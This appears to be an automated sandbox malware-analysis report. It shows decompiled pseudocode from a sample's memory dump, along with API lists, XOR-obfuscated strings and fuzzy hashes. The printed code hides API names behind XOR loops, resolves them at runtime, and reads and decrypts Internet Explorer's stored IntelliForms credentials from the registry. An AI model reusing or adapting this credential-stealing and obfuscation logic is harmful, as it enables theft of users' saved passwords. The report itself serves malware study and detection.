							_t254 = L001F57CC( >=  ?  *0x248780 : _t467,  >=  ?  *0x248870 : 0x248870);
							_t256 = L001F57CC(E001F5C6D(), _t254);
							 *((char*)(_t492 - 0x11)) = 0;
							_t445 = _t492 - 0x24;
							_push( *((intOrPtr*)(_t492 - 0x11)));
							 *(_t492 - 0x24) = _t256;
							E001D4BA2(_t445);
							_t477 = 4;
							 *(_t492 - 4) = _t477;
							_t258 = E001D54AA(_t351, _t492 - 0x58, _t445, _t467, _t477);
							__eflags = _t445;
							if(_t445 != 0) {
								L21:
								_t349 = 1;
								__eflags = 1;
								 *(_t492 - 0x3a) = 1;
							} else {
								__eflags = _t258 - 0x19000;
								if(_t258 > 0x19000) {
									goto L21;
								} else {
									 *(_t492 - 0x3a) = _t445;
									_t349 = 1;
								}
							}
							 *(_t492 - 4) =  *(_t492 - 4) | 0xffffffff;
							E001D2D4F(_t492 - 0x58);
							__eflags =  *(_t492 - 0x3a);
							if( *(_t492 - 0x3a) == 0) {
								goto L64;
							} else {
								_t386 = 0x34;
								 *(_t492 - 0x24) = 0x60756434;
								 *((short*)(_t492 - 0x20)) = 0x7c;
								_t260 = 0;
								__eflags = 0;
								while(1) {
									 *(_t492 + _t260 - 0x23) =  *(_t492 + _t260 - 0x23) ^ _t386;
									_t260 =  &(_t260->i);
									__eflags = _t260 - _t477;
									if(__eflags >= 0) {
										break;
									}
									_t95 = _t492 - 0x24; // 0x60756434
									_t386 =  *_t95;
								}
								 *((char*)(_t492 - 0x1f)) = 0;
								_t262 = E00206A2E(_t349, _t467, _t477, __eflags, _t492 - 0x23);
								 *(_t492 - 0x14) = _t262;
								__eflags = _t262;
								if(_t262 != 0) {
									__eflags =  *0x248794 - 0x10;
									_t481 =  >=  ?  *0x248780 : _t467;
									_t302 = E001F5C6D();
									_push(0);
									_t449 =  >=  ?  *0x248780 : _t467;
									_push(L001F57CC(_t302,  >=  ?  *0x248780 : _t467));
									_t304 = E001F5F32(_t302, __eflags,  *(_t492 - 0x14), ";");
									 *(_t492 - 0x14) = 0x7d687929;
									_t482 = _t304;
									 *((short*)(_t492 - 0x10)) = 0x1461;
									__eflags = 0;
									_t450 = 0x29;
									 *((char*)(_t492 - 0xe)) = 0;
									_t402 = 0;
									while(1) {
										 *(_t492 + _t402 - 0x13) =  *(_t492 + _t402 - 0x13) ^ _t450;
										_t402 = _t402 + 1;
										__eflags = _t402 - 5;
										if(__eflags >= 0) {
											break;
										}
										_t450 =  *(_t492 - 0x14);
									}
									_push(0);
									 *((char*)(_t492 - 0xe)) = 0;
									E0020AC5D(E001F5F32(_t402, __eflags, _t492 - 0x13, _t482));
									L002001B3(_t482);
								}
								__eflags =  *0x248884 - 0x10;
								_t447 =  >=  ?  *0x248870 : 0x248870;
								__eflags =  *0x248794 - 0x10;
								_t468 =  >=  ?  *0x248780 : _t467;
								_t388 =  >=  ?  *0x248780 : _t467;
								_t263 = L001F57CC( >=  ?  *0x248780 : _t467,  >=  ?  *0x248870 : 0x248870);
								_t266 = LoadLibraryA(L001F57CC(E001F5C6D(), _t263)); // executed
								_t479 = _t266;
								_t238 = 0;
								__eflags = _t479;
								if(_t479 != 0) {
									_t390 = 0x21;
									 *0x24c1d4 = _t349;
									 *(_t492 - 0x17) = _t390;
									 *(_t492 - 0x16) = 0x7e72726f;
									 *((intOrPtr*)(_t492 - 0x12)) = 0x55484f68;
									 *((char*)(_t492 - 0xe)) = 0;
									while(1) {
										 *(_t492 + _t238 - 0x16) =  *(_t492 + _t238 - 0x16) ^ _t390;
										_t238 = _t238 + 1;
										__eflags = _t238 - 8;
										if(_t238 >= 8) {
											break;
										}
										_t390 =  *(_t492 - 0x17);
									}
									_t119 = _t492 - 0x16; // 0x7e72726f
									 *((char*)(_t492 - 0xe)) = 0;
									_t268 = GetProcAddress(_t479, _t119);
									_t391 = 8;
									 *0x24c1d8 = _t268;
									_t269 = 0;
									__eflags = 0;
									 *(_t492 - 0x1b) = _t391;
									 *(_t492 - 0x1a) = 0x575b5b46;
									 *(_t492 - 0x16) = 0x7c7d605b;
									 *((intOrPtr*)(_t492 - 0x12)) = 0x667f676c;
									 *((char*)(_t492 - 0xe)) = 0;
									while(1) {
										 *(_t492 + _t269 - 0x1a) =  *(_t492 + _t269 - 0x1a) ^ _t391;
										_t269 =  &(_t269->i);
										__eflags = _t269 - 0xc;
										if(_t269 >= 0xc) {
											break;
										}
										_t391 =  *(_t492 - 0x1b);
									}
									 *((char*)(_t492 - 0xe)) = 0;
									_t271 = GetProcAddress(_t479, _t492 - 0x1a);
									asm("movaps xmm0, [0x23dbf0]");
									_t392 = 0;
									__eflags = 0;
									 *0x24c1f4 = _t271;
									asm("movups [ebp-0x58], xmm0");
									 *(_t492 - 0x48) = 0x534f6146;
									 *((intOrPtr*)(_t492 - 0x44)) = 0x5e454679;
									 *((char*)(_t492 - 0x40)) = 0;
									do {
										 *(_t492 + _t392 - 0x57) =  *(_t492 + _t392 - 0x57) ^  *(_t492 - 0x58);
										_t392 =  &(_t392->i);
										__eflags = _t392 - 0x17;
									} while (_t392 < 0x17);
									 *((char*)(_t492 - 0x40)) = 0;
									_t274 = GetProcAddress(_t479, _t492 - 0x57);
									_t393 = _t349;
									 *0x24c1f8 = _t274;
									 *(_t492 - 0x1c) = _t393;
									_t275 = 0;
									__eflags = 0;
									 *(_t492 - 0x1b) = 0x30304a51;
									 *(_t492 - 0x17) = 0x6473475e;
									 *(_t492 - 0x13) = 0x6e6d5264;
									 *((short*)(_t492 - 0xf)) = 0x75;
									while(1) {
										 *(_t492 + _t275 - 0x1b) =  *(_t492 + _t275 - 0x1b) ^ _t393;
										_t275 =  &(_t275->i);
										__eflags = _t275 - 0xd;
										if(_t275 >= 0xd) {
											break;
										}
										_t393 =  *(_t492 - 0x1c);
									}
									_t153 = _t492 - 0x1b; // 0x30304a51
									 *((char*)(_t492 - 0xe)) = 0;
									_t277 = GetProcAddress(_t479, _t153);
									asm("movaps xmm0, [0x23db70]");
									_t394 = 0;
									__eflags = 0;
									 *0x24c1e8 = _t277;
									asm("movups [ebp-0x37], xmm0");
									 *((short*)(_t492 - 0x27)) = 0x4051;
									 *((char*)(_t492 - 0x25)) = 0;
									do {
										 *(_t492 + _t394 - 0x36) =  *(_t492 + _t394 - 0x36) ^  *(_t492 - 0x37);
										_t394 =  &(_t394->i);
										__eflags = _t394 - 0x11;
									} while (_t394 < 0x11);
									 *((char*)(_t492 - 0x25)) = 0;
									_t280 = GetProcAddress(_t479, _t492 - 0x36);
									asm("movaps xmm0, [0x23d950]");
									_t395 = 0;
									__eflags = 0;
									 *0x24c1e4 = _t280;
									asm("movups [ebp-0x35], xmm0");
									 *((char*)(_t492 - 0x25)) = 0;
									do {
										 *(_t492 + _t395 - 0x34) =  *(_t492 + _t395 - 0x34) ^  *(_t492 - 0x35);
										_t395 =  &(_t395->i);
										__eflags = _t395 - 0xf;
									} while (_t395 < 0xf);
									 *((char*)(_t492 - 0x25)) = 0;
									_t283 = GetProcAddress(_t479, _t492 - 0x34);
									 *(_t492 - 0x13) = _t349;
									_t396 = 0x5e;
									__eflags = 0;
									 *0x24c1e0 = _t283;
									 *(_t492 - 0x1b) = 0x322f2d5e;
									_t284 = 0;
									 *(_t492 - 0x17) = 0x6d3b2a37;
									 *((intOrPtr*)(_t492 - 0x12)) = 0x303b2e31;
									 *((char*)(_t492 - 0xe)) = 0;
									while(1) {
										 *(_t492 + _t284 - 0x1a) =  *(_t492 + _t284 - 0x1a) ^ _t396;
										_t284 = _t284 + 1;
										__eflags = _t284 - 0xc;
										if(_t284 >= 0xc) {
											break;
										}
										_t181 = _t492 - 0x1b; // 0x322f2d5e
										_t396 =  *_t181;
									}
									_t182 = _t492 - 0x1a; // 0x575b5b46
									 *((char*)(_t492 - 0xe)) = 0;
									_t286 = GetProcAddress(_t479, _t182);
									asm("movaps xmm0, [0x23dce0]");
									_t397 = 0;
									 *0x24c1cc = _t286;
									asm("movups [ebp-0x38], xmm0");
									 *(_t492 - 0x28) = 0x3c7851;
									do {
										 *(_t492 + _t397 - 0x37) =  *(_t492 + _t397 - 0x37) ^  *(_t492 - 0x38);
										_t397 = _t397 + 1;
										__eflags = _t397 - 0x12;
									} while (_t397 < 0x12);
									 *((char*)(_t492 - 0x25)) = 0;
									_t289 = GetProcAddress(_t479, _t492 - 0x37);
									_t398 = 0x2d;
									 *0x24c1dc = _t289;
									_t290 = 0;
									 *(_t492 - 0x1b) = _t398;
									 *(_t492 - 0x1a) = 0x44415c5e;
									 *(_t492 - 0x16) = 0x721e4859;
									 *((intOrPtr*)(_t492 - 0x12)) = 0x5d48595e;
									 *((char*)(_t492 - 0xe)) = 0;
									while(1) {
										 *(_t492 + _t290 - 0x1a) =  *(_t492 + _t290 - 0x1a) ^ _t398;
										_t290 = _t290 + 1;
										__eflags = _t290 - 0xc;
										if(_t290 >= 0xc) {
											break;
										}
										_t201 = _t492 - 0x1b; // 0x322f2d5e
										_t398 =  *_t201;
									}
									 *((char*)(_t492 - 0xe)) = 0;
									_t292 = GetProcAddress(_t479, _t492 - 0x1a);
									asm("movaps xmm0, [0x23dd50]");
									_t399 = 0;
									__eflags = 0;
									_t355 = 0x43;
									 *0x24c1d0 = _t292;
									asm("movups [ebp-0x39], xmm0");
									 *((char*)(_t492 - 0x29)) = 0x52;
									 *(_t492 - 0x28) = _t355;
									 *((short*)(_t492 - 0x27)) = 0x525e;
									 *((char*)(_t492 - 0x25)) = 0;
									do {
										 *(_t492 + _t399 - 0x38) =  *(_t492 + _t399 - 0x38) ^  *(_t492 - 0x39);
										_t399 =  &(_t399->i);
										__eflags = _t399 - 0x13;
									} while (_t399 < 0x13);
									 *((char*)(_t492 - 0x25)) = 0;
									_t295 = GetProcAddress(_t479, _t492 - 0x38);
									asm("movaps xmm0, [0x23dc70]");
									_t400 = 0;
									__eflags = 0;
									 *0x24c1f0 = _t295;
									asm("movups [ebp-0x36], xmm0");
									 *((short*)(_t492 - 0x26)) = 0x47;
									do {
										 *(_t492 + _t400 - 0x35) =  *(_t492 + _t400 - 0x35) ^  *(_t492 - 0x36);
										_t400 =  &(_t400->i);
										__eflags = _t400 - 0x10;
									} while (_t400 < 0x10);
									 *((char*)(_t492 - 0x25)) = 0;
									 *0x24c1fc = GetProcAddress(_t479, _t492 - 0x35);
									_t299 = 0;
									__eflags = 0;
									 *(_t492 - 0x33) = _t355;
									 *(_t492 - 0x32) = 0x2a2f3230;
									 *((intOrPtr*)(_t492 - 0x2e)) = 0x1c702637;
									 *((intOrPtr*)(_t492 - 0x2a)) = 0x302c2f20;
									 *((short*)(_t492 - 0x26)) = 0x26;
									while(1) {
										 *(_t492 + _t299 - 0x32) =  *(_t492 + _t299 - 0x32) ^ _t355;
										_t299 =  &(_t299->i);
										__eflags = _t299 - 0xd;
										if(_t299 >= 0xd) {
											break;
										}
										_t355 =  *(_t492 - 0x33);
									}
									 *((char*)(_t492 - 0x25)) = 0;
									 *0x24c1ec = GetProcAddress(_t479, _t492 - 0x32);
									goto L63;
								}
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t492 - 0xc));
				return _t238;
			}

0x001e06e2
0x001e06e7
0x001e06f6
0x001e06f8
0x001e06f9
0x001e06fc
0x001e0ebd
0x001e0ec4
0x001e0ef8
0x001e0ef8
0x001e0ef8
0x001e0ec6
0x001e0ec6
0x001e0ecd
0x00000000
0x001e0ecf
0x001e0ecf
0x001e0ed6
0x00000000
0x001e0ed8
0x001e0ed8
0x001e0edf
0x00000000
0x001e0ee1
0x001e0ee1
0x001e0ee8
0x00000000
0x001e0eea
0x001e0eea
0x001e0ef1
0x00000000
0x001e0ef3
0x001e0ef5
0x001e0ef5
0x001e0ef1
0x001e0ee8
0x001e0edf
0x001e0ed6
0x001e0ecd
0x001e0702
0x001e0704
0x001e0705
0x001e0707
0x001e070d
0x001e0711
0x001e0713
0x001e0716
0x001e0719
0x001e071d
0x001e071d
0x001e0721
0x001e0725
0x00000000
0x00000000
0x001e0727
0x001e0727
0x001e072f
0x001e0735
0x001e073c
0x001e073d
0x001e073f
0x001e0e81
0x001e0e81
0x001e0e88
0x001e0eb7
0x001e0eb7
0x001e0eb7
0x001e0e8a
0x001e0e8a
0x001e0e91
0x00000000
0x001e0e93
0x001e0e93
0x001e0e9a
0x00000000
0x001e0e9c
0x001e0e9c
0x001e0ea3
0x00000000
0x001e0ea5
0x001e0ea5
0x001e0eac
0x00000000
0x001e0eae
0x001e0eae
0x001e0eb5
0x00000000
0x00000000
0x001e0eb5
0x001e0eac
0x001e0ea3
0x001e0e9a
0x001e0e91
0x001e0eb9
0x001e0745
0x001e0745
0x001e0751
0x001e0756
0x001e075f
0x001e0766
0x001e076d
0x001e077d
0x001e0782
0x001e0789
0x001e078f
0x001e0792
0x001e0798
0x001e079f
0x001e07a4
0x001e07ad
0x001e07b2
0x001e07b4
0x001e07ba
0x001e07c3
0x001e07ca
0x001e07cf
0x001e07d3
0x001e07da
0x001e07e5
0x001e07e8
0x001e07eb
0x001e07f3
0x001e07fb
0x001e0800
0x001e080e
0x001e0815
0x001e081c
0x001e0823
0x001e0833
0x001e083a
0x001e083b
0x001e0842
0x001e0845
0x001e0848
0x001e084b
0x001e0850
0x001e0851
0x001e0854
0x001e0857
0x001e085b
0x001e085d
0x001e085d
0x001e0861
0x001e0864
0x001e0867
0x001e086a
0x001e0871
0x001e0879
0x001e0880
0x001e0888
0x001e088d
0x001e0894
0x001e0899
0x001e08a2
0x001e08a9
0x001e08ae
0x001e08b8
0x001e08be
0x001e08cc
0x001e08d3
0x001e08da
0x001e08e1
0x001e08e8
0x001e08ed
0x001e08ef
0x001e08f1
0x001e08f6
0x001e08f7
0x001e08fa
0x001e08ff
0x001e0901
0x001e090d
0x001e0912
0x001e0918
0x001e091b
0x001e091f
0x001e0921
0x001e0923
0x001e0926
0x001e0928
0x001e0931
0x001e0933
0x001e0938
0x001e093f
0x001e0944
0x001e0949
0x001e094c
0x001e094d
0x001e094d
0x001e0953
0x001e0958
0x001e0958
0x001e0958
0x001e0959
0x001e095b
0x001e096a
0x001e096c
0x001e095d
0x001e095d
0x001e095f
0x00000000
0x001e0961
0x001e0963
0x001e0963
0x001e095f
0x001e0971
0x001e097f
0x001e0986
0x001e098d
0x001e0994
0x001e09a4
0x001e09a9
0x001e09b0
0x001e09b0
0x001e09b0
0x001e09b5
0x001e09bc
0x001e09c4
0x001e09cc
0x001e09cc
0x001e09d1
0x001e09df
0x001e09e6
0x001e09ed
0x001e09f4
0x001e0a04
0x001e0a09
0x001e0a10
0x001e0a16
0x001e0a19
0x001e0a22
0x001e0a29
0x001e0a2e
0x001e0a35
0x001e0a37
0x001e0a3c
0x001e0a3e
0x001e0e7e
0x001e0e80
0x001e0e80
0x00000000
0x001e0a44
0x001e0a44
0x001e0a52
0x001e0a59
0x001e0a60
0x001e0a67
0x001e0a77
0x001e0a7c
0x001e0a80
0x001e0a83
0x001e0a89
0x001e0a8c
0x001e0a94
0x001e0a98
0x001e0a9b
0x001e0aa0
0x001e0aa2
0x001e0ab3
0x001e0ab5
0x001e0ab5
0x001e0ab6
0x001e0aa4
0x001e0aa4
0x001e0aa9
0x00000000
0x001e0aab
0x001e0aad
0x001e0ab0
0x001e0ab0
0x001e0aa9
0x001e0ab9
0x001e0ac0
0x001e0ac5
0x001e0ac9
0x00000000
0x001e0acf
0x001e0acf
0x001e0ad1
0x001e0ad8
0x001e0ade
0x001e0ade
0x001e0ae0
0x001e0ae0
0x001e0ae4
0x001e0ae5
0x001e0ae7
0x00000000
0x00000000
0x001e0ae9
0x001e0ae9
0x001e0ae9
0x001e0af1
0x001e0af6
0x001e0afb
0x001e0aff
0x001e0b01
0x001e0b03
0x001e0b0c
0x001e0b13
0x001e0b18
0x001e0b1a
0x001e0b23
0x001e0b2c
0x001e0b34
0x001e0b3b
0x001e0b3d
0x001e0b43
0x001e0b45
0x001e0b47
0x001e0b4a
0x001e0b4c
0x001e0b4c
0x001e0b50
0x001e0b51
0x001e0b54
0x00000000
0x00000000
0x001e0b56
0x001e0b56
0x001e0b5b
0x001e0b5c
0x001e0b6a
0x001e0b70
0x001e0b75
0x001e0b78
0x001e0b84
0x001e0b8b
0x001e0b92
0x001e0b99
0x001e0b9b
0x001e0bb1
0x001e0bb7
0x001e0bb9
0x001e0bbb
0x001e0bbd
0x001e0bc5
0x001e0bc6
0x001e0bcc
0x001e0bcf
0x001e0bd6
0x001e0bdd
0x001e0be0
0x001e0be0
0x001e0be4
0x001e0be5
0x001e0be8
0x00000000
0x00000000
0x001e0bea
0x001e0bea
0x001e0bf5
0x001e0bfa
0x001e0bfe
0x001e0c02
0x001e0c03
0x001e0c08
0x001e0c08
0x001e0c0a
0x001e0c0d
0x001e0c14
0x001e0c1b
0x001e0c22
0x001e0c26
0x001e0c26
0x001e0c2a
0x001e0c2b
0x001e0c2e
0x00000000
0x00000000
0x001e0c30
0x001e0c30
0x001e0c38
0x001e0c3e
0x001e0c40
0x001e0c47
0x001e0c47
0x001e0c49
0x001e0c4e
0x001e0c52
0x001e0c59
0x001e0c60
0x001e0c64
0x001e0c67
0x001e0c6b
0x001e0c6c
0x001e0c6c
0x001e0c74
0x001e0c7a
0x001e0c7c
0x001e0c7e
0x001e0c83
0x001e0c86
0x001e0c86
0x001e0c88
0x001e0c8f
0x001e0c96
0x001e0c9d
0x001e0ca3
0x001e0ca3
0x001e0ca7
0x001e0ca8
0x001e0cab
0x00000000
0x00000000
0x001e0cad
0x001e0cad
0x001e0cb2
0x001e0cb5
0x001e0cbb
0x001e0cbd
0x001e0cc4
0x001e0cc4
0x001e0cc6
0x001e0ccb
0x001e0ccf
0x001e0cd5
0x001e0cd9
0x001e0cdc
0x001e0ce0
0x001e0ce1
0x001e0ce1
0x001e0ce9
0x001e0cef
0x001e0cf1
0x001e0cf8
0x001e0cf8
0x001e0cfa
0x001e0cff
0x001e0d03
0x001e0d07
0x001e0d0a
0x001e0d0e
0x001e0d0f
0x001e0d0f
0x001e0d17
0x001e0d1d
0x001e0d1f
0x001e0d22
0x001e0d24
0x001e0d26
0x001e0d2b
0x001e0d32
0x001e0d34
0x001e0d3b
0x001e0d42
0x001e0d45
0x001e0d45
0x001e0d49
0x001e0d4a
0x001e0d4d
0x00000000
0x00000000
0x001e0d4f
0x001e0d4f
0x001e0d4f
0x001e0d54
0x001e0d57
0x001e0d5c
0x001e0d5e
0x001e0d65
0x001e0d67
0x001e0d6c
0x001e0d70
0x001e0d77
0x001e0d7a
0x001e0d7e
0x001e0d7f
0x001e0d7f
0x001e0d87
0x001e0d8c
0x001e0d90
0x001e0d91
0x001e0d96
0x001e0d98
0x001e0d9b
0x001e0da2
0x001e0da9
0x001e0db0
0x001e0db3
0x001e0db3
0x001e0db7
0x001e0db8
0x001e0dbb
0x00000000
0x00000000
0x001e0dbd
0x001e0dbd
0x001e0dbd
0x001e0dc5
0x001e0dca
0x001e0dcc
0x001e0dd3
0x001e0dd3
0x001e0dd7
0x001e0dd8
0x001e0ddd
0x001e0de1
0x001e0de5
0x001e0de8
0x001e0dee
0x001e0df2
0x001e0df5
0x001e0df9
0x001e0dfa
0x001e0dfa
0x001e0e02
0x001e0e08
0x001e0e0a
0x001e0e11
0x001e0e11
0x001e0e13
0x001e0e18
0x001e0e1c
0x001e0e22
0x001e0e25
0x001e0e29
0x001e0e2a
0x001e0e2a
0x001e0e32
0x001e0e3a
0x001e0e3f
0x001e0e3f
0x001e0e41
0x001e0e44
0x001e0e4b
0x001e0e52
0x001e0e59
0x001e0e5f
0x001e0e5f
0x001e0e63
0x001e0e64
0x001e0e67
0x00000000
0x00000000
0x001e0e69
0x001e0e69
0x001e0e71
0x001e0e79
0x00000000
0x001e0e79
0x001e0bbd
0x001e0ac9
0x001e0a3e
0x001e073f
0x001e0f00
0x001e0f08

APIs

__EH_prolog.LIBCMT ref: 001E06E2

Part of subcall function 001F5C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 001F5CB7

Part of subcall function 001F57CC: __EH_prolog.LIBCMT ref: 001F57D1

SetCurrentDirectoryA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00000000), ref: 001E08B8

Part of subcall function 001E0568: __EH_prolog.LIBCMT ref: 001E056D

LoadLibraryA.KERNEL32(00000000,?,00000000,00000000), ref: 001E0BB1
GetProcAddress.KERNEL32(00000000,orr~hOHU), ref: 001E0BFE
GetProcAddress.KERNEL32(00000000,575B5B46), ref: 001E0C3E
GetProcAddress.KERNEL32(00000000,?), ref: 001E0C7A
GetProcAddress.KERNEL32(00000000,QJ00F[[W), ref: 001E0CBB
GetProcAddress.KERNEL32(00000000,?), ref: 001E0CEF
GetProcAddress.KERNEL32(00000000,?), ref: 001E0D1D
GetProcAddress.KERNEL32(00000000,F[[W[`}|1.;0), ref: 001E0D5C
GetProcAddress.KERNEL32(00000000,?), ref: 001E0D8C
GetProcAddress.KERNEL32(00000000,44415C5E), ref: 001E0DCA
GetProcAddress.KERNEL32(00000000,?), ref: 001E0E08
GetProcAddress.KERNEL32(00000000,?), ref: 001E0E38
GetProcAddress.KERNEL32(00000000,2A2F3230), ref: 001E0E77

Strings

/,0, xrefs: 001E0E52
QJ00F[[W, xrefs: 001E0CB2, 001E0CB9
4du`|, xrefs: 001E0AE9
02/*, xrefs: 001E0E44
yFE^, xrefs: 001E0C59
&, xrefs: 001E0E59
orr~hOHU, xrefs: 001E0BF5, 001E0BF8
FaOS, xrefs: 001E0C52

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$H_prolog$CurrentDirectoryEnvironmentLibraryLoadVariable
String ID: /,0$&$02/*$4du`|$FaOS$QJ00F[[W$orr~hOHU$yFE^
API String ID: 2800488537-1778109498
Opcode ID: 86bac51344169a050998c0b39f35959c9936c63c816312bc610c443bb1351bad
Instruction ID: 54091fdeceff3cbebcf1bb871b8e0afc7cf24d841b5a1b51076dcb13e52870ba
Opcode Fuzzy Hash: 86bac51344169a050998c0b39f35959c9936c63c816312bc610c443bb1351bad
Instruction Fuzzy Hash: 0F32F434901788CFDB06EFF8E8547EEBBB5AF2A300F64056DD455A7252DBB04A85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001E9F5D, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 169
encryptionstringCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E001E9F5D(intOrPtr __ecx, signed int __edx, short* _a4) {
				signed int _v9;
				WCHAR* _v16;
				char _v20;
				signed int _v24;
				long* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				short _v68;
				char _v88;
				void* __ebp;
				int _t52;
				intOrPtr _t56;
				void* _t58;
				short* _t66;
				signed int _t69;
				signed char _t83;
				WCHAR* _t89;
				signed char _t90;
				short _t98;
				void* _t101;
				intOrPtr _t102;
				void* _t103;
				WCHAR* _t104;
				void* _t105;
				void* _t106;

				_v40 = __ecx;
				_t104 = 0;
				_v28 = 0;
				_t89 = __edx;
				_v32 = __edx;
				_t52 = CryptAcquireContextA( &_v28, 0, 0, 1, 0xf0000000); // executed
				if(_t52 == 0) {
					L20:
					return _t52;
				}
				_push( &_v16);
				_push(0);
				_push(0);
				_push(0x8004);
				_push(_v28);
				_v16 = 0;
				if( *0x22d048() == 0) {
					L10:
					_t52 = CryptReleaseContext(_v28, 0);
					if(_t104 == 0) {
						goto L20;
					}
					_v24 = _v24 & 0x00000000;
					_t56 = E001F592B(0x80000001, L"Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", _t104,  &_v24, 0, 0); // executed
					_t102 = _t56;
					if(_t102 != 0) {
						_t58 = _v24;
						if(_t58 != 0) {
							_v32 = _v32 & 0x00000000;
							_v44 = _t102;
							_v48 = _t58;
							_v16 = _t89;
							_v20 = 2 + lstrlenW(_t89) * 2;
							_push( &_v36);
							_push(1);
							_push(0);
							_push(0);
							_push( &_v20);
							_push(0);
							_push( &_v48);
							if( *0x22d058() != 0 && _v32 != 0) {
								_t66 = _a4;
								_t120 = _t66;
								if(_t66 != 0) {
									_t98 = 0x3f;
									 *_t66 = _t98;
								}
								_push(0);
								_push(0);
								_push(_v36);
								_push(_v32);
								_push(_t89);
								_t101 = 4;
								E001E9D30(_v40, _t101, _t120);
								LocalFree(_v32);
							}
							E00205A55(_t102);
						}
					}
					return E00205A55(_t104);
				}
				_t69 = lstrlenW(_t89);
				_push(0);
				_push(2 + _t69 * 2);
				_push(_t89);
				_push(_v16);
				if( *0x22d04c() == 0) {
					L9:
					 *0x22d008(_v16);
					goto L10;
				}
				_push(0);
				_v24 = 0x14;
				_push( &_v24);
				_push( &_v88);
				_push(2);
				_push(_v16);
				if( *0x22d004() == 0) {
					goto L9;
				}
				_push(0x100);
				_v9 = 0;
				_t104 = E00206832();
				_t103 = 0;
				_pop(0);
				 *_t104 = 0;
				if(_v24 <= 0) {
					L8:
					wsprintfW( &_v68, L"%02X", _v9 & 0x000000ff);
					_t106 = _t106 + 0xc;
					lstrcatW(_t104,  &_v68);
					goto L9;
				}
				_t90 = 0;
				do {
					_t83 =  *((intOrPtr*)(_t105 + _t103 - 0x54));
					_t90 = _t90 + _t83;
					wsprintfW( &_v68, L"%02X", _t83 & 0x000000ff);
					_t106 = _t106 + 0xc;
					lstrcatW(_t104,  &_v68);
					_t103 = _t103 + 1;
				} while (_t103 < _v24);
				_v9 = _t90;
				_t89 = _v32;
				goto L8;
			}

0x001e9f6d
0x001e9f74
0x001e9f76
0x001e9f7c
0x001e9f7f
0x001e9f82
0x001e9f8a
0x001ea12f
0x001ea12f
0x001ea12f
0x001e9f95
0x001e9f96
0x001e9f97
0x001e9f98
0x001e9f9d
0x001e9fa0
0x001e9fab
0x001ea06f
0x001ea074
0x001ea07c
0x00000000
0x00000000
0x001ea082
0x001ea098
0x001ea09d
0x001ea0a4
0x001ea0a6
0x001ea0ab
0x001ea0ad
0x001ea0b2
0x001ea0b5
0x001ea0b8
0x001ea0ca
0x001ea0d0
0x001ea0d1
0x001ea0d3
0x001ea0d4
0x001ea0d8
0x001ea0d9
0x001ea0dd
0x001ea0e6
0x001ea0ee
0x001ea0f1
0x001ea0f3
0x001ea0f7
0x001ea0f8
0x001ea0f8
0x001ea0fe
0x001ea100
0x001ea102
0x001ea105
0x001ea108
0x001ea10b
0x001ea10c
0x001ea117
0x001ea117
0x001ea11e
0x001ea123
0x001ea0ab
0x00000000
0x001ea12a
0x001e9fb2
0x001e9fb8
0x001e9fc0
0x001e9fc1
0x001e9fc2
0x001e9fcd
0x001ea066
0x001ea069
0x00000000
0x001ea069
0x001e9fd3
0x001e9fd7
0x001e9fde
0x001e9fe2
0x001e9fe3
0x001e9fe5
0x001e9ff0
0x00000000
0x00000000
0x001e9ff2
0x001e9ff7
0x001ea000
0x001ea002
0x001ea006
0x001ea007
0x001ea00d
0x001ea044
0x001ea052
0x001ea058
0x001ea060
0x00000000
0x001ea060
0x001ea00f
0x001ea011
0x001ea011
0x001ea015
0x001ea024
0x001ea02a
0x001ea032
0x001ea038
0x001ea039
0x001ea03e
0x001ea041
0x00000000

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,?,00000000), ref: 001E9F82
CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000,?,00000000), ref: 001E9FA3
lstrlenW.KERNEL32(?,?,00000000), ref: 001E9FB2
CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 001E9FC5
CryptGetHashParam.ADVAPI32(00000000,00000002,?,?,00000000,?,00000000), ref: 001E9FE8
wsprintfW.USER32 ref: 001EA024
lstrcatW.KERNEL32(00000000,?), ref: 001EA032
wsprintfW.USER32 ref: 001EA052
lstrcatW.KERNEL32(00000000,?), ref: 001EA060
CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 001EA069
CryptReleaseContext.ADVAPI32(?,00000000,?,00000000), ref: 001EA074
lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 001EA0BB
CryptUnprotectData.CRYPT32(?,00000000,001EA2AF,00000000,00000000,00000001,?), ref: 001EA0DE
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 001EA117

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 001EA08E
%02X, xrefs: 001EA01E, 001EA04C

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

